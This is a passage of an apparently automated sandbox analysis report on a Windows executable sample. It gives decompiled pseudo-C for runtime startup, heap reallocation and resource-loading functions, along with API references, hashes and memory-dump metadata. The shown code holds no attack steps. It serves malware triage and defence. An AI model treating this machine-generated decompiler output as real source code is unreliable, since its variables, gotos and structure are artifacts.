                                                                              • Instruction Fuzzy Hash: 2D510530A08716AFCB258F18D9D4BEA77B2AB45714F25866BD40287391E778DCC2864D
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004178F9, Relevance: 7.7, APIs: 5, Instructions: 172COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 97%
                                                                              			E004178F9() {
				void* __ebp;
				signed int _t51;
				signed int _t55;
				long _t59;
				signed int _t61;
				signed int _t62;
				signed int _t64;
				signed int _t65;
				void* _t69;
				signed int* _t78;
				signed int _t81;
				signed int _t82;
				signed int _t84;
				signed int _t85;
				signed int _t86;
				signed char _t89;
				signed int _t96;
				void* _t99;
				int _t101;
				void** _t103;
				void** _t105;
				signed int** _t106;
				intOrPtr* _t109;
				void* _t110;

				_t51 = E00412247(0x480);
				if(_t51 != 0) {
					 *0x45bb20 = _t51;
					 *0x45bb18 = 0x20;
					_t1 = _t51 + 0x480; // 0x480
					_t84 = _t1;
					while(1) {
						__eflags = _t51 - _t84;
						if(_t51 >= _t84) {
							break;
						}
						 *_t51 =  *_t51 | 0xffffffff;
						 *(_t51 + 8) =  *(_t51 + 8) & 0x00000000;
						 *((char*)(_t51 + 4)) = 0;
						 *((char*)(_t51 + 5)) = 0xa;
						_t85 =  *0x45bb20; // 0x5c0640
						_t51 = _t51 + 0x24;
						_t84 = _t85 + 0x480;
						__eflags = _t84;
					}
					GetStartupInfoA(_t110 + 0x14);
					__eflags =  *((short*)(_t110 + 0x46));
					if( *((short*)(_t110 + 0x46)) == 0) {
						L26:
						_t81 = 0;
						__eflags = 0;
						do {
							_t86 =  *0x45bb20; // 0x5c0640
							_t103 = _t86 + (_t81 + _t81 * 8) * 4;
							__eflags =  *_t103 - 0xffffffff;
							if( *_t103 != 0xffffffff) {
								_t49 =  &(_t103[1]);
								 *_t49 = _t103[1] | 0x00000080;
								__eflags =  *_t49;
								goto L42;
							}
							__eflags = _t81;
							_t103[1] = 0x81;
							if(_t81 != 0) {
								asm("sbb eax, eax");
								_t59 =  ~(_t81 - 1) + 0xfffffff5;
								__eflags = _t59;
							} else {
								_t59 = 0xfffffff6;
							}
							_t99 = GetStdHandle(_t59);
							__eflags = _t99 - 0xffffffff;
							if(_t99 == 0xffffffff) {
								L40:
								_t103[1] = _t103[1] | 0x00000040;
							} else {
								_t61 = GetFileType(_t99);
								__eflags = _t61;
								if(_t61 == 0) {
									goto L40;
								}
								_t62 = _t61 & 0x000000ff;
								__eflags = _t62 - 2;
								 *_t103 = _t99;
								if(__eflags != 0) {
									__eflags = _t62 - 3;
									if(__eflags == 0) {
										_t42 =  &(_t103[1]);
										 *_t42 = _t103[1] | 0x00000008;
										__eflags =  *_t42;
									}
								} else {
									_t103[1] = _t103[1] | 0x00000040;
								}
								_t44 =  &(_t103[3]); // 0xc
								_push(0xfa0);
								_t64 = E0041AD20(__eflags);
								__eflags = _t64;
								if(_t64 == 0) {
									L30:
									_t55 = _t64 | 0xffffffff;
									L44:
									return _t55;
								} else {
									_t103[2] = _t103[2] + 1;
									goto L42;
								}
							}
							L42:
							_t81 = _t81 + 1;
							__eflags = _t81 - 3;
						} while (_t81 < 3);
						SetHandleCount( *0x45bb18);
						_t55 = 0;
						__eflags = 0;
						goto L44;
					}
					_t65 =  *(_t110 + 0x48);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L26;
					}
					_t101 =  *_t65;
					_t109 = _t65 + 4;
					 *(_t110 + 0x10) = _t101 + _t109;
					__eflags = _t101 - 0x800;
					if(_t101 >= 0x800) {
						_t101 = 0x800;
					}
					__eflags =  *0x45bb18 - _t101; // 0x20
					if(__eflags >= 0) {
						L18:
						_t82 = 0;
						__eflags = _t101;
						if(_t101 <= 0) {
							goto L26;
						} else {
							goto L19;
						}
						do {
							L19:
							_t69 =  *( *(_t110 + 0x10));
							__eflags = _t69 - 0xffffffff;
							if(_t69 == 0xffffffff) {
								goto L25;
							}
							_t89 =  *_t109;
							__eflags = _t89 & 0x00000001;
							if((_t89 & 0x00000001) == 0) {
								goto L25;
							}
							__eflags = _t89 & 0x00000008;
							if(__eflags != 0) {
								L23:
								_t105 = 0x45bb20[_t82 >> 5] + ((_t82 & 0x0000001f) + (_t82 & 0x0000001f) * 8) * 4;
								 *_t105 =  *( *(_t110 + 0x10));
								_t105[1] =  *_t109;
								_t30 =  &(_t105[3]); // 0xc
								_push(0xfa0);
								_t64 = E0041AD20(__eflags);
								__eflags = _t64;
								if(_t64 == 0) {
									goto L30;
								}
								_t31 =  &(_t105[2]);
								 *_t31 = _t105[2] + 1;
								__eflags =  *_t31;
								goto L25;
							}
							__eflags = GetFileType(_t69);
							if(__eflags == 0) {
								goto L25;
							}
							goto L23;
							L25:
							 *(_t110 + 0x10) =  &(( *(_t110 + 0x10))[1]);
							_t82 = _t82 + 1;
							_t109 = _t109 + 1;
							__eflags = _t82 - _t101;
						} while (_t82 < _t101);
						goto L26;
					} else {
						_t106 = 0x45bb24;
						while(1) {
							_t78 = E00412247(0x480);
							__eflags = _t78;
							if(_t78 == 0) {
								break;
							}
							 *0x45bb18 =  *0x45bb18 + 0x20;
							 *_t106 = _t78;
							_t12 =  &(_t78[0x120]); // 0x480
							_t96 = _t12;
							while(1) {
								__eflags = _t78 - _t96;
								if(_t78 >= _t96) {
									break;
								}
								 *_t78 =  *_t78 | 0xffffffff;
								_t78[2] = _t78[2] & 0x00000000;
								_t78[1] = 0;
								_t78[1] = 0xa;
								_t78 =  &(_t78[9]);
								_t96 =  &(( *_t106)[0x120]);
								__eflags = _t96;
							}
							_t106 =  &(_t106[1]);
							__eflags =  *0x45bb18 - _t101; // 0x20
							if(__eflags < 0) {
								continue;
							}
							goto L18;
						}
						_t101 =  *0x45bb18; // 0x20
						goto L18;
					}
				}
				return _t51 | 0xffffffff;
			}



























                                                                              0x00417903
                                                                              0x0041790b
                                                                              0x00417915
                                                                              0x0041791a
                                                                              0x00417924
                                                                              0x00417924
                                                                              0x0041794a
                                                                              0x0041794a
                                                                              0x0041794c
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041792c
                                                                              0x0041792f
                                                                              0x00417933
                                                                              0x00417937
                                                                              0x0041793b
                                                                              0x00417941
                                                                              0x00417944
                                                                              0x00417944
                                                                              0x00417944
                                                                              0x00417956
                                                                              0x0041795c
                                                                              0x00417962
                                                                              0x00417a51
                                                                              0x00417a51
                                                                              0x00417a51
                                                                              0x00417a53
                                                                              0x00417a53
                                                                              0x00417a5c
                                                                              0x00417a5f
                                                                              0x00417a62
                                                                              0x00417ad3
                                                                              0x00417ad3
                                                                              0x00417ad3
                                                                              0x00000000
                                                                              0x00417ad3
                                                                              0x00417a64
                                                                              0x00417a66
                                                                              0x00417a6a
                                                                              0x00417a7b
                                                                              0x00417a7d
                                                                              0x00417a7d
                                                                              0x00417a6c
                                                                              0x00417a6e
                                                                              0x00417a6e
                                                                              0x00417a87
                                                                              0x00417a89
                                                                              0x00417a8c
                                                                              0x00417acd
                                                                              0x00417acd
                                                                              0x00417a8e
                                                                              0x00417a8f
                                                                              0x00417a95
                                                                              0x00417a97
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00417a99
                                                                              0x00417a9e
                                                                              0x00417aa1
                                                                              0x00417aa3
                                                                              0x00417aab
                                                                              0x00417aae
                                                                              0x00417ab0
                                                                              0x00417ab0
                                                                              0x00417ab0
                                                                              0x00417ab0
                                                                              0x00417aa5
                                                                              0x00417aa5
                                                                              0x00417aa5
                                                                              0x00417ab4
                                                                              0x00417ab7
                                                                              0x00417abd
                                                                              0x00417ac2
                                                                              0x00417ac6
                                                                              0x00417a71
                                                                              0x00417a71
                                                                              0x00417aef
                                                                              0x00000000
                                                                              0x00417ac8
                                                                              0x00417ac8
                                                                              0x00000000
                                                                              0x00417ac8
                                                                              0x00417ac6
                                                                              0x00417ad7
                                                                              0x00417ad7
                                                                              0x00417ad8
                                                                              0x00417ad8
                                                                              0x00417ae7
                                                                              0x00417aed
                                                                              0x00417aed
                                                                              0x00000000
                                                                              0x00417aed
                                                                              0x00417968
                                                                              0x0041796c
                                                                              0x0041796e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00417974
                                                                              0x00417976
                                                                              0x0041797c
                                                                              0x00417985
                                                                              0x00417987
                                                                              0x00417989
                                                                              0x00417989
                                                                              0x0041798b
                                                                              0x00417991
                                                                              0x004179e1
                                                                              0x004179e1
                                                                              0x004179e3
                                                                              0x004179e5
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004179e7
                                                                              0x004179e7
                                                                              0x004179eb
                                                                              0x004179ed
                                                                              0x004179f0
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004179f2
                                                                              0x004179f5
                                                                              0x004179f8
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004179fa
                                                                              0x004179fd
                                                                              0x00417a0a
                                                                              0x00417a1e
                                                                              0x00417a27
                                                                              0x00417a2c
                                                                              0x00417a2f
                                                                              0x00417a32
                                                                              0x00417a38
                                                                              0x00417a3d
                                                                              0x00417a41
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00417a43
                                                                              0x00417a43
                                                                              0x00417a43
                                                                              0x00000000
                                                                              0x00417a43
                                                                              0x00417a06
                                                                              0x00417a08
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00417a46
                                                                              0x00417a46
                                                                              0x00417a4b
                                                                              0x00417a4c
                                                                              0x00417a4d
                                                                              0x00417a4d
                                                                              0x00000000
                                                                              0x00417993
                                                                              0x00417993
                                                                              0x00417998
                                                                              0x00417999
                                                                              0x0041799e
                                                                              0x004179a1
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004179a3
                                                                              0x004179aa
                                                                              0x004179ac
                                                                              0x004179ac
                                                                              0x004179ca
                                                                              0x004179ca
                                                                              0x004179cc
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004179b4
                                                                              0x004179b7
                                                                              0x004179bb
                                                                              0x004179bf
                                                                              0x004179c5
                                                                              0x004179c8
                                                                              0x004179c8
                                                                              0x004179c8
                                                                              0x004179ce
                                                                              0x004179d1
                                                                              0x004179d7
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004179d9
                                                                              0x004179db
                                                                              0x00000000
                                                                              0x004179db
                                                                              0x00417991
                                                                              0x00000000

                                                                              APIs
                                                                              • GetStartupInfoA.KERNEL32(?), ref: 00417956
                                                                              • GetFileType.KERNEL32(?), ref: 00417A00
                                                                              • GetStdHandle.KERNEL32(-000000F6), ref: 00417A81
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: FileHandleInfoStartupType
                                                                              • String ID:
                                                                              • API String ID: 2461013171-0
                                                                              • Opcode ID: 2468a7fb6b581299d97185e491f5b1cae576bf7ec8e0cf272241cd6d45883991
                                                                              • Instruction ID: c1dad45932cd3bab1fb4690d5443e572ef26b780f196b193fce980895ef8ff34
                                                                              • Opcode Fuzzy Hash: 2468a7fb6b581299d97185e491f5b1cae576bf7ec8e0cf272241cd6d45883991
                                                                              • Instruction Fuzzy Hash: 9F5108716083418FD7108B28C884BAA7BF4FF11365F28862ED5A6C72E2D778E589C749
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00413347, Relevance: 7.6, APIs: 5, Instructions: 150COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 50%
                                                                              			E00413347(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				long _t30;
				long _t31;
				long _t33;
				void* _t36;
				long _t38;
				long _t41;
				long _t42;
				long _t44;
				long _t46;
				void* _t59;
				long _t61;
				void* _t67;
				void* _t68;

				_push(0x14);
				_push(0x44bcb0);
				E00412BA4(__ebx, __edi, __esi);
				_t59 =  *(_t67 + 8);
				if(_t59 != 0) {
					_t61 =  *(_t67 + 0xc);
					__eflags = _t61;
					if(_t61 != 0) {
						__eflags =  *0x45bc48 - 3;
						if( *0x45bc48 != 3) {
							while(1) {
								_t28 = 0;
								__eflags = _t61 - 0xffffffe0;
								if(_t61 <= 0xffffffe0) {
									__eflags = _t61;
									if(_t61 == 0) {
										_t61 = 1;
										__eflags = 1;
									}
									_t28 = HeapReAlloc( *0x45bc44, 0, _t59, _t61);
								}
								__eflags = _t28;
								if(_t28 != 0) {
									goto L37;
								}
								__eflags =  *0x45a59c; // 0x0
								if(__eflags == 0) {
									goto L37;
								}
								_t30 = E004154B7(_t61);
								__eflags = _t30;
								if(_t30 != 0) {
									continue;
								}
								goto L36;
							}
							goto L37;
						} else {
							goto L5;
						}
						do {
							L5:
							 *(_t67 - 0x1c) = 0;
							__eflags = _t61 - 0xffffffe0;
							if(_t61 > 0xffffffe0) {
								L25:
								_t28 =  *(_t67 - 0x1c);
								__eflags =  *(_t67 - 0x1c);
								if( *(_t67 - 0x1c) != 0) {
									goto L37;
								}
								__eflags =  *0x45a59c; // 0x0
								if(__eflags == 0) {
									goto L37;
								}
								goto L27;
							}
							E004148F8(0, _t59, 4);
							 *(_t67 - 4) = 0;
							_t33 = E004149DC(_t59);
							 *(_t67 - 0x20) = _t33;
							__eflags = _t33;
							if(_t33 == 0) {
								L21:
								 *(_t67 - 4) =  *(_t67 - 4) | 0xffffffff;
								E004134AF();
								__eflags =  *(_t67 - 0x20);
								if( *(_t67 - 0x20) == 0) {
									__eflags = _t61;
									if(_t61 == 0) {
										_t61 = 1;
										__eflags = 1;
									}
									_t61 = _t61 + 0x0000000f & 0xfffffff0;
									__eflags = _t61;
									 *(_t67 + 0xc) = _t61;
									 *(_t67 - 0x1c) = HeapReAlloc( *0x45bc44, 0, _t59, _t61);
								}
								goto L25;
							}
							__eflags = _t61 -  *0x45bc34; // 0x0
							if(__eflags <= 0) {
								_push(_t61);
								_push(_t59);
								_push(_t33);
								_t41 = E00414EDC();
								_t68 = _t68 + 0xc;
								__eflags = _t41;
								if(_t41 == 0) {
									_push(_t61);
									_t42 = E004151BB();
									 *(_t67 - 0x1c) = _t42;
									__eflags = _t42;
									if(_t42 != 0) {
										_t44 =  *((intOrPtr*)(_t59 - 4)) - 1;
										 *(_t67 - 0x24) = _t44;
										__eflags = _t44 - _t61;
										if(_t44 >= _t61) {
											_t44 = _t61;
										}
										E00411AC0( *(_t67 - 0x1c), _t59, _t44);
										_t46 = E004149DC(_t59);
										 *(_t67 - 0x20) = _t46;
										_push(_t59);
										_push(_t46);
										E00414A07();
										_t68 = _t68 + 0x18;
									}
								} else {
									 *(_t67 - 0x1c) = _t59;
								}
							}
							__eflags =  *(_t67 - 0x1c);
							if( *(_t67 - 0x1c) == 0) {
								__eflags = _t61;
								if(_t61 == 0) {
									_t61 = 1;
									__eflags = 1;
									 *(_t67 + 0xc) = 1;
								}
								_t61 = _t61 + 0x0000000f & 0xfffffff0;
								 *(_t67 + 0xc) = _t61;
								_t36 = HeapAlloc( *0x45bc44, 0, _t61);
								 *(_t67 - 0x1c) = _t36;
								__eflags = _t36;
								if(_t36 != 0) {
									_t38 =  *((intOrPtr*)(_t59 - 4)) - 1;
									 *(_t67 - 0x24) = _t38;
									__eflags = _t38 - _t61;
									if(_t38 >= _t61) {
										_t38 = _t61;
									}
									E00411AC0( *(_t67 - 0x1c), _t59, _t38);
									_push(_t59);
									_push( *(_t67 - 0x20));
									E00414A07();
									_t68 = _t68 + 0x14;
								}
							}
							goto L21;
							L27:
							_t31 = E004154B7(_t61);
							__eflags = _t31;
						} while (_t31 != 0);
						goto L36;
					} else {
						_push(_t59);
						E00412A4D();
						L36:
						_t28 = 0;
						__eflags = 0;
						goto L37;
					}
				} else {
					_t28 = E00412247( *(_t67 + 0xc));
					L37:
					return E00412BDF(_t28);
				}
			}
















                                                                              0x00413347
                                                                              0x00413349
                                                                              0x0041334e
                                                                              0x00413353
                                                                              0x0041335a
                                                                              0x0041336a
                                                                              0x0041336d
                                                                              0x0041336f
                                                                              0x0041337d
                                                                              0x00413384
                                                                              0x004134b8
                                                                              0x004134b8
                                                                              0x004134ba
                                                                              0x004134bd
                                                                              0x004134bf
                                                                              0x004134c1
                                                                              0x004134c5
                                                                              0x004134c5
                                                                              0x004134c5
                                                                              0x004134cf
                                                                              0x004134cf
                                                                              0x004134d5
                                                                              0x004134d7
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004134d9
                                                                              0x004134df
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004134e2
                                                                              0x004134e8
                                                                              0x004134ea
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004134ea
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041338a
                                                                              0x0041338a
                                                                              0x0041338a
                                                                              0x0041338d
                                                                              0x00413390
                                                                              0x00413487
                                                                              0x00413487
                                                                              0x0041348a
                                                                              0x0041348c
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041348e
                                                                              0x00413494
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00413494
                                                                              0x00413398
                                                                              0x0041339e
                                                                              0x004133a2
                                                                              0x004133a8
                                                                              0x004133ab
                                                                              0x004133ad
                                                                              0x00413457
                                                                              0x00413457
                                                                              0x0041345b
                                                                              0x00413460
                                                                              0x00413463
                                                                              0x00413465
                                                                              0x00413467
                                                                              0x0041346b
                                                                              0x0041346b
                                                                              0x0041346b
                                                                              0x0041346f
                                                                              0x0041346f
                                                                              0x00413472
                                                                              0x00413484
                                                                              0x00413484
                                                                              0x00000000
                                                                              0x00413463
                                                                              0x004133b3
                                                                              0x004133b9
                                                                              0x004133bb
                                                                              0x004133bc
                                                                              0x004133bd
                                                                              0x004133be
                                                                              0x004133c3
                                                                              0x004133c6
                                                                              0x004133c8
                                                                              0x004133cf
                                                                              0x004133d0
                                                                              0x004133d6
                                                                              0x004133d9
                                                                              0x004133db
                                                                              0x004133e0
                                                                              0x004133e1
                                                                              0x004133e4
                                                                              0x004133e6
                                                                              0x004133e8
                                                                              0x004133e8
                                                                              0x004133ef
                                                                              0x004133f5
                                                                              0x004133fa
                                                                              0x004133fd
                                                                              0x004133fe
                                                                              0x004133ff
                                                                              0x00413404
                                                                              0x00413404
                                                                              0x004133ca
                                                                              0x004133ca
                                                                              0x004133ca
                                                                              0x004133c8
                                                                              0x00413407
                                                                              0x0041340a
                                                                              0x0041340c
                                                                              0x0041340e
                                                                              0x00413412
                                                                              0x00413412
                                                                              0x00413413
                                                                              0x00413413
                                                                              0x00413419
                                                                              0x0041341c
                                                                              0x00413427
                                                                              0x0041342d
                                                                              0x00413430
                                                                              0x00413432
                                                                              0x00413437
                                                                              0x00413438
                                                                              0x0041343b
                                                                              0x0041343d
                                                                              0x0041343f
                                                                              0x0041343f
                                                                              0x00413446
                                                                              0x0041344b
                                                                              0x0041344c
                                                                              0x0041344f
                                                                              0x00413454
                                                                              0x00413454
                                                                              0x00413432
                                                                              0x00000000
                                                                              0x00413496
                                                                              0x00413497
                                                                              0x0041349d
                                                                              0x0041349d
                                                                              0x00000000
                                                                              0x00413371
                                                                              0x00413371
                                                                              0x00413372
                                                                              0x004134ec
                                                                              0x004134ec
                                                                              0x004134ec
                                                                              0x00000000
                                                                              0x004134ec
                                                                              0x0041335c
                                                                              0x0041335f
                                                                              0x004134ee
                                                                              0x004134f3
                                                                              0x004134f3

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d0e75feacb3952567d4b929dbadc0c47e54cdab04a0d338bdacd5cb5536ce837
                                                                              • Instruction ID: 460f3097ad44880e582e2490eeb19ed50333ea5f5c037b58f2b4340b407dfc65
                                                                              • Opcode Fuzzy Hash: d0e75feacb3952567d4b929dbadc0c47e54cdab04a0d338bdacd5cb5536ce837
                                                                              • Instruction Fuzzy Hash: EF41C771D00265AE8F32AF668D448EF7E64EB41766710413FF814A6251DB3C8ED1CB9D
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004087EA, Relevance: 7.6, APIs: 5, Instructions: 133COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 82%
                                                                              			E004087EA(intOrPtr* __ecx, void* _a4, signed int _a8, intOrPtr _a12) {
				void* _v8;
				void* _v12;
				intOrPtr _v16;
				signed int _v20;
				void* _t59;
				signed int _t61;
				signed int _t62;
				void* _t64;
				int* _t72;
				struct HWND__* _t73;
				intOrPtr _t78;
				struct HRSRC__* _t81;
				void* _t82;
				void* _t86;
				void* _t88;
				void* _t89;
				intOrPtr _t90;
				void* _t93;
				intOrPtr _t95;
				intOrPtr _t101;
				intOrPtr _t103;
				struct HINSTANCE__* _t105;
				intOrPtr* _t106;
				void* _t107;

				_t106 = __ecx;
				_v8 = 0;
				_v12 = 0;
				if(_a8 != 0) {
					_t105 =  *(E0042D179() + 0xc);
					_t81 = FindResourceA(_t105, _a8, 0xf0);
					if(_t81 != 0) {
						_t82 = LoadResource(_t105, _t81);
						_v12 = _t82;
						if(_t82 == 0) {
							return 0;
						}
						_v8 = LockResource(_t82);
					}
				}
				__eflags = _v8;
				_t86 = _a4;
				_t103 = _a12;
				_v16 = 1;
				if(_v8 != 0) {
					_t78 =  *((intOrPtr*)( *_t106 + 0x1c))(_t86, _v8, _t103);
					__eflags = _v12;
					_v16 = _t78;
					if(_v12 != 0) {
						FreeResource(_v12);
					}
				}
				_t59 =  *(_t86 + 0x48);
				__eflags = _t59;
				if(_t59 == 0) {
					L25:
					return _v16;
				} else {
					_t88 =  *(_t59 + 0x40);
					_a8 = _a8 & 0x00000000;
					__eflags = _t88;
					_a4 = _t88;
					_v12 = _t88;
					if(_t88 != 0) {
						_a8 =  *(E00409D70( &_a4));
					}
					_t61 = 0;
					__eflags =  *(_t103 + 8);
					_v8 = 0;
					if( *(_t103 + 8) > 0) {
						do {
							_t89 = _a8;
							__eflags = _t89;
							if(_t89 == 0) {
								L17:
								_t90 =  *((intOrPtr*)(_t103 + 0xc));
								_t62 = _t61 << 3;
								__eflags =  *(_t62 + _t90);
								_v20 = _t62;
								if( *(_t62 + _t90) != 0) {
									_t107 = E00424440(0xc);
									__eflags = _t107;
									if(_t107 == 0) {
										_t107 = 0;
										__eflags = 0;
									} else {
										_t72 =  *((intOrPtr*)(_t103 + 0xc)) + _v20;
										_t73 = GetDlgItem( *(_t86 + 0x1c),  *_t72);
										 *(_t107 + 4) =  *(_t107 + 4) & 0x00000000;
										 *(_t107 + 8) = _t72[1];
										_t103 = _a12;
										 *_t107 = _t73;
									}
									_t93 =  *(_t86 + 0x48) + 0x3c;
									__eflags = _v12;
									_push(_t107);
									if(__eflags == 0) {
										E0042324A(_t93, __eflags);
									} else {
										_push(_v12);
										E00423273(_t93);
									}
								}
								goto L24;
							}
							_t95 =  *((intOrPtr*)(_t89 + 4));
							_t101 =  *((intOrPtr*)(_t103 + 0xc));
							__eflags =  *((intOrPtr*)(_t95 + 0x28)) -  *((intOrPtr*)(_t101 + _t61 * 8));
							if( *((intOrPtr*)(_t95 + 0x28)) !=  *((intOrPtr*)(_t101 + _t61 * 8))) {
								goto L17;
							} else {
								_t64 = _a4;
								__eflags = _t64;
								_v12 = _t64;
								if(_t64 == 0) {
									_a8 = _a8 & 0x00000000;
								} else {
									_a8 =  *(E00409D70( &_a4));
								}
							}
							L24:
							_t61 = _v8 + 1;
							__eflags = _t61 -  *(_t103 + 8);
							_v8 = _t61;
						} while (_t61 <  *(_t103 + 8));
					}
					goto L25;
				}
			}



























                                                                              0x004087f8
                                                                              0x004087fa
                                                                              0x004087fd
                                                                              0x00408800
                                                                              0x00408807
                                                                              0x00408813
                                                                              0x0040881b
                                                                              0x0040881f
                                                                              0x00408827
                                                                              0x0040882a
                                                                              0x00000000
                                                                              0x0040882c
                                                                              0x0040883a
                                                                              0x0040883a
                                                                              0x0040881b
                                                                              0x0040883d
                                                                              0x00408840
                                                                              0x00408843
                                                                              0x00408846
                                                                              0x0040884d
                                                                              0x00408858
                                                                              0x0040885b
                                                                              0x0040885f
                                                                              0x00408862
                                                                              0x00408867
                                                                              0x00408867
                                                                              0x00408862
                                                                              0x0040886d
                                                                              0x00408870
                                                                              0x00408872
                                                                              0x00408953
                                                                              0x00000000
                                                                              0x00408878
                                                                              0x00408878
                                                                              0x0040887b
                                                                              0x0040887f
                                                                              0x00408881
                                                                              0x00408884
                                                                              0x00408887
                                                                              0x00408897
                                                                              0x00408897
                                                                              0x0040889a
                                                                              0x0040889c
                                                                              0x0040889f
                                                                              0x004088a2
                                                                              0x004088a8
                                                                              0x004088a8
                                                                              0x004088ab
                                                                              0x004088ad
                                                                              0x004088e3
                                                                              0x004088e3
                                                                              0x004088e6
                                                                              0x004088e9
                                                                              0x004088ed
                                                                              0x004088f0
                                                                              0x004088f9
                                                                              0x004088fb
                                                                              0x004088fe
                                                                              0x00408925
                                                                              0x00408925
                                                                              0x00408900
                                                                              0x00408909
                                                                              0x00408911
                                                                              0x00408917
                                                                              0x0040891b
                                                                              0x0040891e
                                                                              0x00408921
                                                                              0x00408921
                                                                              0x0040892a
                                                                              0x0040892d
                                                                              0x00408931
                                                                              0x00408932
                                                                              0x0040893e
                                                                              0x00408934
                                                                              0x00408934
                                                                              0x00408937
                                                                              0x00408937
                                                                              0x00408932
                                                                              0x00000000
                                                                              0x004088f0
                                                                              0x004088af
                                                                              0x004088b2
                                                                              0x004088b8
                                                                              0x004088bb
                                                                              0x00000000
                                                                              0x004088bd
                                                                              0x004088bd
                                                                              0x004088c0
                                                                              0x004088c2
                                                                              0x004088c5
                                                                              0x004088dd
                                                                              0x004088c7
                                                                              0x004088d8
                                                                              0x004088d8
                                                                              0x004088c5
                                                                              0x00408943
                                                                              0x00408946
                                                                              0x00408947
                                                                              0x0040894a
                                                                              0x0040894a
                                                                              0x004088a8
                                                                              0x00000000
                                                                              0x004088a2

                                                                              APIs
                                                                              • FindResourceA.KERNEL32(?,?,000000F0), ref: 00408813
                                                                              • LoadResource.KERNEL32(?,00000000), ref: 0040881F
                                                                              • LockResource.KERNEL32(00000000), ref: 00408834
                                                                              • FreeResource.KERNEL32(00000000), ref: 00408867
                                                                              • GetDlgItem.USER32 ref: 00408911
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Resource$FindFreeItemLoadLock
                                                                              • String ID:
                                                                              • API String ID: 996205394-0
                                                                              • Opcode ID: b151616d18eed73c92286105b6934e45a53b4e3f52cee11c1b33bcc8ae767154
                                                                              • Instruction ID: 5b731adef1ac3c1e154523c16717b7f00c832ecd9bc0f2e4d9b3e5289d424512
                                                                              • Opcode Fuzzy Hash: b151616d18eed73c92286105b6934e45a53b4e3f52cee11c1b33bcc8ae767154
                                                                              • Instruction Fuzzy Hash: 55514971A00205EFCB14EF65C984A6EBBB5FF04350F10C46EE945AB391DB38DA41DB54
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0040AEF8, Relevance: 7.6, APIs: 5, Instructions: 126windowthreadCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 87%
                                                                              			E0040AEF8(void* __ebx, void* __ecx) {
				void* _t62;
				void* _t63;
				void* _t76;

				E004128A0(E004310B7, _t76);
				_t62 =  *((intOrPtr*)(_t76 + 0xc)) + 0x2cc;
				if(_t62 > 0xf) {
					L20:
					_t63 = 0;
				} else {
					switch( *((intOrPtr*)(( *(_t62 + 0x40b0e4) & 0x000000ff) * 4 +  &M0040B0BC))) {
						case 0:
							__eax =  *(__ebp + 0x10);
							 *__eax = 2;
							 *(__eax + 8) = 1;
							goto L19;
						case 1:
